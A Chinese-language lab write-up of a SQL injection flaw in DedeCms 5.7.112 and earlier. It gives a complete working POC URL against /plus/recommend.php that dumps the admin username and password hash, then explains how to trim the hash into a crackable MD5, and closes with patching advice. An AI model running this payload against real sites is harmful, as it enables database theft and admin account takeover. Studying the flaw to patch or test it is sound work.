漏洞描述
管理系统(DedeCms)存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息,此漏洞影响版本为DedeCms 5.7.112及以下。
影响版本
DedeCms <= 5.7.112
漏洞详情与实验步骤
实验环境
渗透主机:win2k8
目标靶机:cms-inject
用户名: college
密码: 360College
访问网站:http://IP:8081
实验步骤
1、启动目标靶机服务:找到phpstudy程序启动位置,启动服务。
2、访问目标网站:输入http://192.168.0.18:8081访问网站主页。
3、利用SQL注入漏洞:访问“/data/admin/ver.txt”页面获取系统最后升级时间,判断是否与漏洞相对应,然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面进行SQL注入测试。
4、POC示例:使用特定的POC语句进行SQL注入,如http://IP:8081/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%27%20or%20mid=@%27
%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+%23@__admin
%20limit+0,1),5,6,7,8,9%23@%27
+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294。
5、获取管理员信息:执行上述POC后,可以直接爆出用户名、密码等信息,需要注意的是,得到的是20位的散列值,去掉前三位和最后一位,得到管理员的16位MD5值,进而可以查询到原始密码。
防护建议
针对此漏洞的解决方案包括:
升级DedeCms至最新版:以修复已知的安全漏洞。
增加参数过滤:对可能引发SQL注入的参数进行严格的过滤和验证。
定期备份和监控:定期备份数据库,并监控网站的异常行为,及时发现并响应安全事件。
DedeCms作为国内知名的PHP开源网站管理系统,其安全性一直备受关注,此次发现的SQL注入漏洞再次提醒我们,即使是广泛使用的开源系统也需要持续关注其安全更新,并采取必要的防护措施来保障网站的安全。
以上就是关于“dedecms漏洞注入”的问题,朋友们可以点击主页了解更多内容,希望可以够帮助大家!
本文来源于互联网,如若侵权,请联系管理员删除,本文链接:https://www.9969.net/90504.html